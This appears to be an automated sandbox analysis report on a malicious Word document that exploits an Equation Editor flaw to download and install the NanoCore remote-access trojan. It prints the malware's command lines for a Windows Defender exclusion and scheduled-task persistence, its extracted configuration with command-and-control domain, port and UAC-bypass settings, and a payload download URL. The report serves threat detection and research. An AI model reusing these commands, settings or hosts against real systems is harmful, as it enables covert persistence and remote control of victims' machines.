Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOC_MDR0307_019.doc

Overview

General Information

Sample Name:DOC_MDR0307_019.doc
Analysis ID:558855
MD5:0f99f373718685c0235b20df7624b00c
SHA1:1ed1e0a6b306bf8bee39628cfcfa2f8e683bec77
SHA256:adc82a58d8c890881cc7781be8e831b948dc06757664946ca302f2ef5200bd38
Tags:doc
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Suspicious Remote Thread Created
Sigma detected: Suspicius Add Task From User AppData Temp
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to detect virtual machines (SLDT)
Potential document exploit detected (performs HTTP gets)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2588 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2792 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • plugmancdht5461.exe (PID: 848 cmdline: C:\Users\user\AppData\Roaming\plugmancdht5461.exe MD5: 7031570AA150B893F68A32900327B2AE)
      • powershell.exe (PID: 2644 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 568 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • schtasks.exe (PID: 1136 cmdline: schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2116 cmdline: schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2136 cmdline: taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • RegSvcs.exe (PID: 1208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0 MD5: 62CE5EF995FD63A1847A196C2E8B267B)
    • smtpsvc.exe (PID: 800 cmdline: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0 MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • smtpsvc.exe (PID: 2284 cmdline: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "910523a1-2f72-4f3f-a340-f1a8b5f9", "Group": "PHADDY", "Domain1": "vijayikohli1.bounceme.net", "Domain2": "127.0.0.1", "Port": 3132, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 57 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.RegSvcs.exe.d90000.12.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      9.2.RegSvcs.exe.d90000.12.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x39eb:$x2: NanoCore.ClientPluginHost
      • 0x3b36:$s4: PipeCreated
      • 0x3a05:$s5: IClientLoggingHost
      9.2.RegSvcs.exe.5f0000.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x4bbb:$x1: NanoCore.ClientPluginHost
      • 0x4be5:$x2: IClientNetworkHost
      9.2.RegSvcs.exe.5f0000.5.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x4bbb:$x2: NanoCore.ClientPluginHost
      • 0x6a6b:$s4: PipeCreated
      9.2.RegSvcs.exe.4610000.30.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x170b:$x1: NanoCore.ClientPluginHost
      • 0x1725:$x2: IClientNetworkHost
      Click to see the 156 entries

      Sigma Overview

      AV Detection

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Exploits

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.58.149.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2792, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe

      E-Banking Fraud

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      System Summary

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, CommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, NewProcessName: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, OriginalFileName: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ProcessId: 848
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788
      Sigma detected: Suspicious Remote Thread Created
      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 2644, StartAddress: 772DF523, TargetImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 2644
      Sigma detected: Suspicius Add Task From User AppData Temp
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp, ProcessId: 568
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, ProcessId: 2644
      Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 2644, StartAddress: 772DF523, TargetImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 2644
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Program Files (x86)\SMTP Service\smtpsvc.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Service
      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, ProcessId: 2644

      Stealing of Sensitive Information

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Remote Access Functionality

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://paxz.tk/plugmanzx.exeAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR
      Found malware configuration
      Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "910523a1-2f72-4f3f-a340-f1a8b5f9", "Group": "PHADDY", "Domain1": "vijayikohli1.bounceme.net", "Domain2": "127.0.0.1", "Port": 3132, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Multi AV Scanner detection for submitted file
      Source: DOC_MDR0307_019.docReversingLabs: Detection: 23%
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\ZdNnwVcb.exeReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeReversingLabs: Detection: 39%
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJoe Sandbox ML: detected
      Source: 9.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.2.RegSvcs.exe.5a0000.2.unpackAvira: Label: TR/NanoCore.fadte
      Source: 9.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

      Exploits

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drStream path '_1704543374/\x1CompObj' : ...........................F....Microsoft Equation
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: smtpsvc.exe, smtpsvc.exe, 00000013.00000002.463928971.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe, 00000013.00000000.461835651.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe.9.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
